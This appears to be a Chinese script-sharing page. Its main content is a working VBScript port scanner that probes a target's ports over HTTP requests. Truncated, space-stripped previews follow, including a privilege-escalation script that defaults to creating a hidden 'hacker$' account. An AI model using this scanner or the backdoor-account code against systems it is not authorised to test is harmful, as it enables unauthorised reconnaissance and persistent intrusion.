用vbs来探测端口的代码 不用注册winsock



On Error Resume Next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end If

if Wscript.Arguments.count=0 Then
usage()
wscript.quit
End If

Set Arg=Wscript.Arguments
Sport= Split(arg(1),",")
For i=0 To UBound(Split(arg(1),","))
wsh.echo "scan "&Sport(i)&" ing……"
Set x=CreateObject("msxml2.serverXMLHTTP")
x.open "post","http://"&arg(0)&":"&Sport(i)
x.send("hello")
wsh.echo Space(3)&"error.NuMbEr:"& ERr.NuMbEr & Space(5)&"ERr.Description:"&ERr.Description
if ERr.NuMbEr=0 Or ERr.NuMbEr=-2147012866 Or ERr.NuMbEr=-2147012894 Or ERr.NuMbEr=-2147012744 Or ERr.NuMbEr=-2147467259 Then
wsh.echo Space(3)&" The "&Sport(i)&" port is OPEN"
End if
next

function usage()
wscript.echo "| 注意查看ERr.Description来判断端口开放,自动探测不一定准确 |"
wscript.echo "| |"
wscript.echo "|Useage: |"
wscript.echo "| cscript.exe this.vbs ip port |"
wscript.echo "|ex: |"
wscript.echo "| cscript.exe this.vbs ip 80 or 80,123,445…… |"
wscript.echo "+-------------------------------------------------------------------+"&chr(10)
end function

vbs列出内网的中计算机(工作组也可以)
'HandleErrorsOnErrorResumeNext'GettheproviderobjectSetprov=GetObject("WinNT:")'ExaminetheavailabledomainstheprovidercanreachForeachdominprov'ExaminetheobjectsinthedomainandcheckforComputerobjectsForea

vbs 注册表操作类代码
OptionExplicitConstWBEM_MAX_WAIT=&H80'RegistryHivesConstHKEY_LOCAL_MACHINE=&H80000002ConstHKEY_CURRENT_USER=&H80000001ConstHKEY_CLASSES_ROOT=&H80000000ConstHKEY_USERS=&H80000003ConstHKEY_CURRENT_CONFI

提权vbs代码
onerrorresumenextdimusername,password:IfWscript.Arguments.CountThen:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="hacker$":password="123456":endif:setwsnetwork=CreateObjec